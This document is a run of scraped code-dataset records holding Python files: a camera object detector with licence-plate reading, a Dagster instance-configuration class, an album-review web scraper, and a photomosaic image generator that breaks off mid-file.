img_width=self.realWidth\n )\n y_pred_decoded = y_pred_decoded[0]\n if y_pred_decoded.shape != (0,):\n y_pred_decoded[:,1] *= 100\n y_pred_decoded = y_pred_decoded.astype(int)\n y_pred_fixed = self._fix_decoded(y_pred_decoded)\n else:\n y_pred_fixed = y_pred_decoded\n return y_pred_fixed\n\n def predict(self,camera,frm):\n batch_images = self.preProccessing(frm)\n with K.get_session().as_default():\n with tf.get_default_graph().as_default():\n y_pred = self.model.getModel().predict(batch_images)\n return self.postProccessing(y_pred)\n\n def start(self):\n print(\"starting \"+ self.name)\n if not self.running and self.thr==None:\n print(\"creating thread\")\n self.thr = Thread(name=self.name+\".helper\",target=self._run, args=())\n self.thr.daemon = True\n self.running = True\n self.thr.start()\n print(\"thread created\")\n return self\n\n def stop(self):\n if self.running:\n self.running = False\n self.thr.join(1)\n return self\n\n def _run(self):\n while self.running:\n camera,frm = self.inQ.get()\n result = self.predict(camera,frm)\n self.outQ.put((self.name,camera,{\"objects\":result},frm,True))\n\n self.dest_queue.put((self.name,None,None,None,False))\n self.running = False\n self.thr = None\n return self\n\n def status(self):\n if not self.running and self.thr==None:\n return \"stopped\"\n elif not self.running:\n return \"stopping\"\n else:\n return \"running\"\n\n\nclass ALPRPredictor:\n def __init__ (self,name,clipsPath,inQ,outQ):\n self.name = name\n self.clipsPath = clipsPath\n self.inQ = inQ\n self.outQ = outQ\n self.thr = None\n self.running = False\n self.state = \"stopped\"\n self.state = {}\n\n\n def predict(self,camera,frm):\n batch_images = self.preProccessing(frm)\n with K.get_session().as_default():\n with tf.get_default_graph().as_default():\n y_pred = self.model.getModel().predict(batch_images)\n return self.postProccessing(y_pred)\n\n def start(self):\n print(\"starting ...\"+ self.name)\n if not self.running and self.thr==None:\n print(\"creando Thread\")\n self.thr = Thread(name=self.name+\".helper\",target=self._run, args=())\n self.thr.daemon = True\n self.running = True\n self.thr.start()\n print(\"started \" + self.name)\n return self\n\n def stop(self):\n if self.running:\n self.running = False\n self.thr.join(1)\n return self\n\n def _run(self):\n while self.running:\n predecesor,cam,result,frm,ok = self.inQ.get()\n camState = getWithDefault(self.state,cam,{\"plates\":[],\"plate\":\"unknown\"})\n self.state[cam]=camState\n print(\"ALPR state: {}\".format(self.state[cam]))\n if ok:\n trailer_present = False\n for pred in result[\"objects\"]:\n if pred[0] == 2:\n trailer_present = True\n if pred[0] == 5 and self.state[cam][\"plate\"] == \"unknown\":\n xmin = pred[2]\n ymin = pred[3]\n xmax = pred[4]\n ymax = pred[5]\n clipName = self.clipsPath + \"/{}.jpg\"\n clipName = clipName.format(cam)\n cv2.imwrite(clipName,frm[ymin-5:ymax+5,xmin-5:xmax+5,:])\n response = subprocess.check_output([\"alpr\", \"--config\", \"config/openalpr.conf\", \"-n\", \"1\",\"-c\",\"mx\",\"-p\",\"mx\", clipName]).decode(\"utf-8\")\n print(\"arlp: {}\".format(response))\n if response != \"No license plates found.\\n\":\n response = response.split(\"\\n\")[1:][0].split(\"\\t\")\n plate = response[0].replace(\" - \", \"\")\n confidence = response[1].split(\":\")[1].strip()\n is_match = response[2].split(\":\")[1].strip()\n if is_match == \"1\":\n self.state[cam][\"plates\"].append(plate)\n best = {}\n print(\"PLATES: {}\".format(self.state[cam]))\n for p in self.state[cam][\"plates\"]:\n cnt = getWithDefault(best,p,0)\n best[p] = cnt + 1\n if best[p] > 1:\n self.state[cam][\"plate\"] = p\n print(\"BEST: {}\".format(best))\n #cv2.putText(img_disp,plate,(xmin_s,int(ymin-12/scale)),\n #cv2.FONT_HERSHEY_SIMPLEX, 1,(0,255,0),2,cv2.LINE_AA)\n #print(\"[{}] {}\".format(plate,confidence))\n if not trailer_present:\n self.state[cam]={\"plate\":\"unknown\",\"plates\":[]}\n result[\"plate\"] = self.state[cam][\"plate\"]\n print(\"PUTTING {}\".format(result))\n self.outQ.put((self.name,cam,result,frm,True))\n else:\n self.outQ.put((self.name,predecesor,{\"name\":self.name,\"predecesor\":predecesor,\"error\":\"Terminó\"},None,False))\n\n\n\n self.dest_queue.put((self.name,None,None,None,False))\n self.running = False\n self.thr = None\n return self\n\n def status(self):\n if not self.running and self.thr==None:\n return \"stopped\"\n elif not self.running:\n return \"stopping\"\n else:\n return \"running\"\n\n\n\n\n\nclass SSD7PredictorWithPlate:\n def __init__ (\n self,\n idPredictor,\n model_path,\n img_height = 300,\n img_width = 480,\n img_channels = 3,\n intensity_mean = 127.5,\n intensity_range = 127.5,\n n_classes = 5,\n scales = [0.08, 0.16, 0.32, 0.64, 0.96],\n aspect_ratios = [0.5, 1.0, 2.0],\n two_boxes_for_ar1 = True,\n steps = None,\n offsets = None,\n clip_boxes = False,\n variances = [1.0, 1.0, 1.0, 1.0],\n normalize_coords = True,\n class_threshold=None,\n confidence_thresh=0.15, #0.25,\n iou_threshold= 0.05, #0.15, #0.45,\n top_k=10):\n\n self.ssd_predictor = SSD7Predictor(\n idPredictor,\n model_path,\n img_height = img_height,\n img_width = img_width,\n img_channels = img_channels,\n intensity_mean = intensity_mean,\n intensity_range = intensity_range,\n n_classes = n_classes,\n scales = scales,\n aspect_ratios = aspect_ratios,\n two_boxes_for_ar1 = two_boxes_for_ar1,\n steps = steps,\n offsets = offsets,\n clip_boxes = clip_boxes,\n variances = variances,\n normalize_coords = normalize_coords,\n class_threshold=class_threshold,\n confidence_thresh=confidence_thresh, #0.25,\n iou_threshold= iou_threshold, #0.15, #0.45,\n top_k=top_k)\n self.id = str(idPredictor)\n # en el vector plates tenemos lecturas y seguimos intentando\n # hasta huntar 5 lecuras iguales\n self.plates = []\n self.plate = \"unknown\"\n\n\n\n def predict(self,camera,frm,idFrame):\n ssd_preds,height,width = self.ssd_predictor.predict(camera,frm,idFrame)\n # ver si no tenemos plate y tenemos un plate (5) en y_pred\n # si sí invocamos alpr a ver si podemos leer la placa (5 veces)\n clip_name = \"data/images/clip-{}.jpg\".format(camera)\n print(\"ssd_preds: {}\".format(ssd_preds))\n trailer_present = False\n for pred in ssd_preds:\n print(\"TRAE: {}\".format(pred[0]))\n if pred[0] == 2:\n print(\"SI HAY TRAILER!\")\n trailer_present = True\n if pred[0] == 5 and self.plate == \"unknown\":\n print(\"TRAE PLACA: {}\".format(pred))\n xmin = pred[2]\n ymin = pred[3]\n xmax = pred[4]\n ymax = pred[5]\n\n cv2.imwrite(clip_name,frm[ymin-5:ymax+5,xmin-5:xmax+5,:])\n for k in range(0,30):\n cv2.imwrite(clip_name+str(k)+\".jpg\",frm[ymin-k:ymax+k,xmin-k:xmax+k,:])\n response = subprocess.check_output([\"alpr\", \"--config\", \"config/openalpr.conf\", \"-n\", \"1\",\"-c\",\"mx\",\"-p\",\"mx\", clip_name]).decode(\"utf-8\")\n print(\"arlp: {}\".format(response))\n if response != \"No license plates found.\\n\":\n response = response.split(\"\\n\")[1:][0].split(\"\\t\")\n plate = response[0].replace(\" - \", \"\")\n confidence = response[1].split(\":\")[1].strip()\n is_match = response[2].split(\":\")[1].strip()\n if is_match == \"1\":\n self.plates.append(plate)\n best = {}\n print(\"PLATES: {}\".format(self.plates))\n for p in self.plates:\n cnt = getWithDefault(best,p,0)\n best[p] = cnt + 1\n if best[p] > 1:\n self.plate = p\n print(\"BEST: {}\".format(best))\n #cv2.putText(img_disp,plate,(xmin_s,int(ymin-12/scale)),\n #cv2.FONT_HERSHEY_SIMPLEX, 1,(0,255,0),2,cv2.LINE_AA)\n #print(\"[{}] {}\".format(plate,confidence))\n else:\n print(response)\n if trailer_present == False:\n print(\"NO HAY TRAILERRRRR\")\n self.plates=[]\n self.plate = \"unknown\"\n return (ssd_preds,height,width,self.plate)\n\n\ndef buildPredictors(models,predictorsConf):\n predictors = {}\n for conf in predictorsConf:\n model = SSD7Model(conf[\"modelName\"],conf[\"weightsPath\"])\n models[model.getName()] = model\n\n return models\n\n\n\ndef buildPredictors(models,queues,predictorsConf):\n predictors = {}\n for conf in predictorsConf:\n if getWithDefault(conf,\"activate\",1):\n if conf[\"type\"]==\"ssd7\":\n model = models[conf[\"model\"]]\n predictor = SSD7Predictor(\n conf[\"name\"],\n model,\n queues[conf[\"qIn\"]],\n queues[conf[\"qOut\"]],\n img_height=getWithDefault(conf,\"img_height\",270),\n img_width=getWithDefault(conf,\"img_width\",480),\n class_threshold=getWithDefault(conf,\"class_threshold\",None)\n )\n else:\n predictor = ALPRPredictor(\n conf[\"name\"],\n conf[\"clipsPath\"],\n queues[conf[\"qIn\"]],\n queues[conf[\"qOut\"]]\n )\n predictors[conf[\"name\"]] = predictor\n print(\"GOT THE CONTROL\")\n predictor.start()\n\n return predictors\n", "sub_path": "src/py/Predictor.py", "file_name": "Predictor.py", "file_ext": "py", "file_size_in_byte": 14032, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.resize", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 66, "usage_type": "call"}, {"api_name": "ssd_encoder_decoder.ssd_output_decoder.decode_detections", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.backend.get_session", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 90, "usage_type": "name"}, {"api_name": "tensorflow.get_default_graph", "line_number": 91, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 99, "usage_type": "call"}, {"api_name": "keras.backend.get_session", "line_number": 146, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 146, "usage_type": "name"}, {"api_name": "tensorflow.get_default_graph", "line_number": 147, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 155, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 171, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 186, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 187, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 199, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 306, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 308, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 309, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 321, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 351, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 359, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 360, "usage_type": "call"}, {"api_name": "utils.generic.getWithDefault", "line_number": 361, "usage_type": "call"}]} +{"seq_id": "66903521", "text": "import os\nfrom collections import namedtuple\n\nimport yaml\n\nfrom dagster import check\nfrom dagster.serdes import ConfigurableClassData, whitelist_for_serdes\n\nfrom .config import DAGSTER_CONFIG_YAML_FILENAME, dagster_instance_config\n\n\ndef _runs_directory(base):\n return os.path.join(base, 'history', '')\n\n\ndef compute_logs_directory(base):\n return os.path.join(base, 'storage')\n\n\ndef _event_logs_directory(base):\n return os.path.join(base, 'history', 'runs', '')\n\n\ndef _schedule_directory(base):\n return os.path.join(base, 'schedules')\n\n\ndef configurable_class_data_or_default(config_value, field_name, default):\n if config_value.get(field_name):\n return ConfigurableClassData(\n config_value[field_name]['module'],\n config_value[field_name]['class'],\n yaml.dump(config_value[field_name].get('config') or {}, default_flow_style=False),\n )\n return default\n\n\n@whitelist_for_serdes\nclass InstanceRef(\n namedtuple(\n '_InstanceRef',\n 'local_artifact_storage_data run_storage_data event_storage_data compute_logs_data '\n 'schedule_storage_data scheduler_data run_launcher_data settings',\n )\n):\n '''Serializable representation of a :py:class:`DagsterInstance`.\n\n Users should not instantiate this class directly.\n '''\n\n def __new__(\n cls,\n local_artifact_storage_data,\n run_storage_data,\n event_storage_data,\n compute_logs_data,\n schedule_storage_data,\n scheduler_data,\n run_launcher_data,\n settings,\n ):\n return super(cls, InstanceRef).__new__(\n cls,\n local_artifact_storage_data=check.inst_param(\n local_artifact_storage_data, 'local_artifact_storage_data', ConfigurableClassData\n ),\n run_storage_data=check.inst_param(\n run_storage_data, 'run_storage_data', ConfigurableClassData\n ),\n event_storage_data=check.inst_param(\n event_storage_data, 'event_storage_data', ConfigurableClassData\n ),\n compute_logs_data=check.inst_param(\n compute_logs_data, 'compute_logs_data', ConfigurableClassData\n ),\n schedule_storage_data=check.opt_inst_param(\n schedule_storage_data, 'schedule_storage_data', ConfigurableClassData\n ),\n scheduler_data=check.opt_inst_param(\n scheduler_data, 'scheduler_data', ConfigurableClassData\n ),\n run_launcher_data=check.opt_inst_param(\n run_launcher_data, 'run_launcher_data', ConfigurableClassData\n ),\n settings=check.opt_dict_param(settings, 'settings'),\n )\n\n @staticmethod\n def from_dir(base_dir, config_filename=DAGSTER_CONFIG_YAML_FILENAME, overrides=None):\n overrides = check.opt_dict_param(overrides, 'overrides')\n config_value = dagster_instance_config(\n base_dir, config_filename=config_filename, overrides=overrides\n )\n\n local_artifact_storage_data = configurable_class_data_or_default(\n config_value,\n 'local_artifact_storage',\n ConfigurableClassData(\n 'dagster.core.storage.root',\n 'LocalArtifactStorage',\n yaml.dump({'base_dir': base_dir}, default_flow_style=False),\n ),\n )\n\n run_storage_data = configurable_class_data_or_default(\n config_value,\n 'run_storage',\n ConfigurableClassData(\n 'dagster.core.storage.runs',\n 'SqliteRunStorage',\n yaml.dump({'base_dir': _runs_directory(base_dir)}, default_flow_style=False),\n ),\n )\n\n event_storage_data = configurable_class_data_or_default(\n config_value,\n 'event_log_storage',\n ConfigurableClassData(\n 'dagster.core.storage.event_log',\n 'SqliteEventLogStorage',\n yaml.dump({'base_dir': _event_logs_directory(base_dir)}, default_flow_style=False),\n ),\n )\n\n compute_logs_data = configurable_class_data_or_default(\n config_value,\n 'compute_logs',\n ConfigurableClassData(\n 'dagster.core.storage.local_compute_log_manager',\n 'LocalComputeLogManager',\n yaml.dump({'base_dir': compute_logs_directory(base_dir)}, default_flow_style=False),\n ),\n )\n\n schedule_storage_data = configurable_class_data_or_default(\n config_value,\n 'schedule_storage',\n ConfigurableClassData(\n 'dagster.core.storage.schedules',\n 'SqliteScheduleStorage',\n yaml.dump({'base_dir': _schedule_directory(base_dir)}, default_flow_style=False),\n ),\n )\n\n scheduler_data = configurable_class_data_or_default(config_value, 'scheduler', None)\n run_launcher_data = configurable_class_data_or_default(\n config_value,\n 'run_launcher',\n ConfigurableClassData('dagster', 'DefaultRunLauncher', yaml.dump({}),),\n )\n\n settings_keys = {'telemetry', 'opt_in'}\n settings = {key: config_value.get(key) for key in settings_keys}\n\n return InstanceRef(\n local_artifact_storage_data=local_artifact_storage_data,\n run_storage_data=run_storage_data,\n event_storage_data=event_storage_data,\n compute_logs_data=compute_logs_data,\n schedule_storage_data=schedule_storage_data,\n scheduler_data=scheduler_data,\n run_launcher_data=run_launcher_data,\n settings=settings,\n )\n\n @staticmethod\n def from_dict(instance_ref_dict):\n def value_for_ref_item(k, v):\n if v is None:\n return None\n if k == 'settings':\n return v\n return ConfigurableClassData(*v)\n\n return InstanceRef(**{k: value_for_ref_item(k, v) for k, v in instance_ref_dict.items()})\n\n @property\n def local_artifact_storage(self):\n return self.local_artifact_storage_data.rehydrate()\n\n @property\n def run_storage(self):\n return self.run_storage_data.rehydrate()\n\n @property\n def event_storage(self):\n return self.event_storage_data.rehydrate()\n\n @property\n def compute_log_manager(self):\n return self.compute_logs_data.rehydrate()\n\n @property\n def schedule_storage(self):\n return self.schedule_storage_data.rehydrate() if self.schedule_storage_data else None\n\n @property\n def scheduler(self):\n return self.scheduler_data.rehydrate() if self.scheduler_data else None\n\n @property\n def run_launcher(self):\n return self.run_launcher_data.rehydrate() if self.run_launcher_data else None\n\n def to_dict(self):\n return self._asdict()\n", "sub_path": "python_modules/dagster/dagster/core/instance/ref.py", "file_name": "ref.py", "file_ext": "py", "file_size_in_byte": 6953, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 30, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 33, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 40, "usage_type": "call"}, {"api_name": "dagster.check.inst_param", "line_number": 64, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 65, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 64, "usage_type": "name"}, {"api_name": "dagster.check.inst_param", "line_number": 67, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 68, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 67, "usage_type": "name"}, {"api_name": "dagster.check.inst_param", "line_number": 70, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 71, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 70, "usage_type": "name"}, {"api_name": "dagster.check.inst_param", "line_number": 73, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 74, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 73, "usage_type": "name"}, {"api_name": "dagster.check.opt_inst_param", "line_number": 76, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 77, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 76, "usage_type": "name"}, {"api_name": "dagster.check.opt_inst_param", "line_number": 79, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 80, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 79, "usage_type": "name"}, {"api_name": "dagster.check.opt_inst_param", "line_number": 82, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 83, "usage_type": "argument"}, {"api_name": "dagster.check", "line_number": 82, "usage_type": "name"}, {"api_name": "dagster.check.opt_dict_param", "line_number": 85, "usage_type": "call"}, {"api_name": "dagster.check", "line_number": 85, "usage_type": "name"}, {"api_name": "config.DAGSTER_CONFIG_YAML_FILENAME", "line_number": 89, "usage_type": "name"}, {"api_name": "dagster.check.opt_dict_param", "line_number": 90, "usage_type": "call"}, {"api_name": "dagster.check", "line_number": 90, "usage_type": "name"}, {"api_name": "config.dagster_instance_config", "line_number": 91, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 98, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 101, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 108, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 111, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 118, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 121, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 128, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 131, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 138, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 141, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 149, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 149, "usage_type": "call"}, {"api_name": "dagster.serdes.ConfigurableClassData", "line_number": 173, "usage_type": "call"}, {"api_name": "dagster.serdes.whitelist_for_serdes", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "337346345", "text": "from music_grapher.models import Band, Album, Reviews, BandSearch\n\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport re\nimport time\nimport requests\nimport math\n\ndef openPage(page):\n headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5)'}\n urllibpage = requests.get(page, headers=headers)\n soup = BeautifulSoup(urllibpage.text, \"html.parser\")\n\ndef getLastBand():\n x = Band.objects.latest('band_id')\n return x.band_id+1\n\ndef getBandData(soup, band_fk):\n albumContainer = soup.find('div', {\"class\" : \"facetContent\"})\n albumList = albumContainer.findChildren()\n for row in albumList: #for each album found\n #Is not a subheadline, needs to be split again\n album = {\n \"album_year\": 0,\n \"album_link\": \"X\",\n \"album_title\": \"X\",\n \"album_type\": \"X\",\n \"critic_score\": 0,\n \"user_score\": 0,\n }\n\n datarow = row.findChildren()\n for data in datarow: #for each album find data\n if data.has_attr(\"class\") and data.get(\"class\")[0] == \"date\" and \"album_year\" not in album:\n album[\"album_year\"] = int(data.text)\n if data.has_attr(\"href\") and \"album_link\" not in album:\n album[\"album_link\"] = \"http://www.albumoftheyear.org\" + data.get('href')\n if data.has_attr(\"class\") and data.get(\"class\")[0] == \"albumTitle\" and \"album_title\" not in album:\n album[\"album_title\"] = data.text\n #if data.has_attr(\"class\") and data[\"class\"][0] == \"type\" and \"album_type\" not in album:\n if data.has_attr(\"class\") and data.get(\"class\")[0] == \"type\" and \"album_type\" not in album:\n album[\"album_type\"] = data.text\n if data.has_attr(\"class\") and data.get(\"class\")[0] == 'ratingRowContainer':\n ratingdiv = data.findChildren()\n for rating in ratingdiv:\n if \"critic score\" in rating.text and \"\\n\" in rating.text and \"critic_score\" not in album:\n album[\"critic_score\"] = int(rating.find(\"div\", {\"class\": \"rating\"}).text)\n album[\"no_critic_reviews\"] = rating.findAll(\"div\", {\"class\": \"ratingText\"})[-1].text\n if \"user score\" in rating.text and \"\\n\" in rating.text and \"user_score\" not in album:\n album[\"user_score\"] = int(rating.find(\"div\", {\"class\": \"rating\"}).text)\n album[\"no_user_reviews\"] = rating.findAll(\"div\", {\"class\": \"ratingText\"})[-1].text\n #If data is complete, insert to DB\n if all([item in album for item in [\"album_year\", \"album_link\", \"album_title\"]]):\n if album[\"critic_score\"] + album[\"user_score\"] != 0:\n if Album.objects.filter(album_link = album['album_link']).count() == 0:\n #Enter data\n Album.objects.create(band_id=band_fk,\n album_name = album['album_title'],\n album_link = album['album_link'],\n critic_score_avg = album['critic_score'],\n user_score_avg = album['user_score'],\n date = album['album_year'])\n\nif __name__ == \"__main__\":\n i = getLast()\n while i < 3000:#40000:\n url = 'https://www.albumoftheyear.org/artist/' + str(id) + '/'\n band_soup = openPage(url)\n getBandData(band_soup, i)\n\n", "sub_path": "get_data.py", "file_name": "get_data.py", "file_ext": "py", "file_size_in_byte": 3512, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "music_grapher.models.Band.objects.latest", "line_number": 16, "usage_type": "call"}, {"api_name": "music_grapher.models.Band.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "music_grapher.models.Band", "line_number": 16, "usage_type": "name"}, {"api_name": "music_grapher.models.Album.objects.filter", "line_number": 56, "usage_type": "call"}, {"api_name": "music_grapher.models.Album.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "music_grapher.models.Album", "line_number": 56, "usage_type": "name"}, {"api_name": "music_grapher.models.Album.objects.create", "line_number": 58, "usage_type": "call"}, {"api_name": "music_grapher.models.Album.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "music_grapher.models.Album", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "504073347", "text": "import os\nfrom PIL import Image\nimport argparse\n\n\ndef getImages(imageDir):\n \"\"\"\n 从小块图像目录中读取图像\n :param imageDir: 目录路径\n :return: 小块图像列表\n \"\"\"\n files = os.listdir(imageDir)\n images = []\n for file in files:\n # os.path.join将目录名和文件名合成一个路径\n # os.path.abspath获取文件的绝对路径\n filePath = os.path.abspath(os.path.join(imageDir, file))\n with open(filePath, \"rb\") as f:\n im = Image.open(f)\n images.append(im)\n # 真实的图像数据直到试图处理该数据才会从文件读取(调用load()方法将强行加载图像数据)。\n im.load()\n return images\n\n\ndef getAverageRGB(image):\n \"\"\"\n 计算图像的RGB平均值\n 每个像素点的RGB值分别累加除以像素点数量\n :param image: Image对象\n :return: 返回平均值\n \"\"\"\n # 像素点数\n pixels = image.size[0] * image.size[1]\n Rlist = list()\n Glist = list()\n Blist = list()\n avg = list()\n for i in range(image.size[0]):\n for j in range(image.size[1]):\n r, g, b = image.getpixel((i, j))\n Rlist.append(r)\n Glist.append(g)\n Blist.append(b)\n # avg_r = sum(Rlist)/pixels\n # avg_g = sum(Glist)/pixels\n # avg_b = sum(Blist)/pixels\n # 每个像素点的r值总和除以像素点数\n avg.append(int(sum(Rlist)/pixels))\n avg.append(int(sum(Glist)/pixels))\n avg.append(int(sum(Blist)/pixels))\n return avg\n\n # npixels = image.size[0] * image.size[1]\n # cols = image.getcolors(npixels)\n # sumRGB = [(x[0] * x[1][0], x[0] * x[1][1], x[0] * x[1][2]) for x in cols]\n # avg = tuple([int(sum(x) / npixels) for x in zip(*sumRGB)])\n # return avg\n\n\ndef splitimage(image, size):\n \"\"\"\n 将图像按网格划分成多个小图像\n :param image: image对象\n :param size: 网格的列数和行数\n :return: 小图像列表\n \"\"\"\n # 图片的宽和高\n W, H = image.size\n # 行数和列数,行数对比高度,列数对比宽度\n x, y = size\n # 获取每个小图像的宽度和高度\n w, h = int(W/y), int(H/x)\n imgs = []\n # 按照每行取出每列的小图像\n for j in range(x):\n for i in range(y):\n # crops裁剪图片,crop(左,上,右,下,),\"左,上\"为小图像的左上点的坐标,\"右,下\"为小图像的右下点的坐标,\n imgs.append(image.crop((i*w, j*h, (i+1)*w, (j+1)*h)))\n return imgs\n\n\ndef getBestMatchIndex(input_avg, avgs):\n \"\"\"\n 寻找颜色值最近的一块小图像\n 把颜色看做是三维空间中的一个点,依据目标点寻找列表中距离最近的一个点\n :param input_avg: 目标的颜色值\n :param avgs: 搜索的颜色值列表\n :return: 距离最近的颜色值图像的列表索引\n \"\"\"\n # 初始索引为0\n # 列表自带索引,但是无法直接列出,索引设置默认索引,后续迭代,一直递增\n index = 0\n # 命中的索引\n min_index = 0\n # float(\"inf\")表示正无穷,float(\"-inf\")表示负无穷\n # 设置初始最小距离为正无穷\n min_dist = float(\"inf\")\n # 遍历颜色值列表,索引从0开始\n for val in avgs:\n # 三维空间两点距离计算公式 (x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2)\n # + (z1 - z2) * (z1 - z2),这里只需要比较大小,所以无需求平方根值\n dist = ((val[0] - input_avg[0]) * (val[0] - input_avg[0]) +\n (val[1] - input_avg[1]) * (val[1] - input_avg[1]) +\n (val[2] - input_avg[2]) * (val[2] - input_avg[2])\n )\n # 第一个计算出来的值肯定小于正无穷,将第一个计算出来的值设置为最小距离,最小距离的索引等于当前的索引值\n # 后续计算出来的值如果比第一个值小,就将新的值设置为最小值,并且最小距离的索引等于新值的索引值\n if dist < min_dist:\n min_dist = dist\n min_index = index\n # 索引递增\n index += 1\n # 遍历完颜色图标表中的所有元素,返回最小距离的颜色值元素索引\n return min_index\n\n\ndef createImageGrid(images, dims):\n \"\"\"\n 将图像列表里的小图像按先行后列的顺序填充到大图像中\n :param images: 小图像列表\n :param dims: 大图像的行数和列数\n :return: 返回拼接的新图像\n \"\"\"\n # m为行数,对应高度,n为列数,对应宽度\n m, n = dims\n # 断言确保小图像的个数满足大图像切割后的网格数量\n assert m * n == len(images)\n # 计算出小图像中最大宽度和高度\n width = max([img.size[0] for img in images])\n height = max([img.size[1] for img in images])\n # 将计算出来的宽高作为每个网格宽高,创建新的大图像\n # 如果某个小图的宽高小于网格的宽高,剩余部分以背景色填充,默认是黑色\n grid_img = Image.new('RGB', (n * width, m * height))\n index = 0\n # # 依次按照先行后列的顺序,依次将小图像填充过去\n for i in range(m):\n for j in range(n):\n # paste(img, (左上角x坐标,左上角y坐标))\n # print(i, j)\n grid_img.paste(images[index], (j * height, i * width))\n # 索引递增,一张图片一张图片的填充\n index += 1\n # 依次将每个小图像粘贴到大图像里\n # for index in range(len(images)):\n # # 计算要粘贴到网格的哪行\n # row = int(index / n)\n # # 计算要粘贴到网格的哪列\n # col = index - n * row\n # # 根据行列数以及网格的大小得到网格的左上角坐标,把小图像粘贴到这里\n # grid_img.paste(images[index], (col * width, row * height))\n return grid_img\n\n\ndef createPhotomosaic(target_image, grid_size, input_imageDir):\n \"\"\"生成图片马赛克主函数\"\"\"\n # 切割目标图像为网格小图像\n print(\">>>目标图片切割\")\n with open(target_image, \"rb\") as f:\n content = Image.open(f)\n target_images = splitimage(content, grid_size)\n print(\">>>读取备选图片列表\")\n # 读取图像列表\n input_images = getImages(input_imageDir)\n print(\">>>备选图片列表颜色平均值\")\n # 计算图像列表中所有图像的颜色平均值\n avgs = list()\n for img in input_images:\n avgs.append(getAverageRGB(img))\n print(\">>>获取替换图片列表\")\n # 匹配到的图像列表的中的小图像新组成一个列表\n output_images = list()\n # 计算目标图像被切割的每个网格小图像的颜色平均值\n for img in target_images:\n avg = getAverageRGB(img)\n # 并和图像列表中的颜色平均值对比,找到合适的图像的索引\n match_index = getBestMatchIndex(avg, avgs)\n output_images.append(input_images[match_index])\n print(\">>>生成新图像\")\n # 将新生成的替换图片列表填充到新生成的图像中\n mosaic_image = createImageGrid(output_images, grid_size)\n return mosaic_image\n\n\ndef main():\n 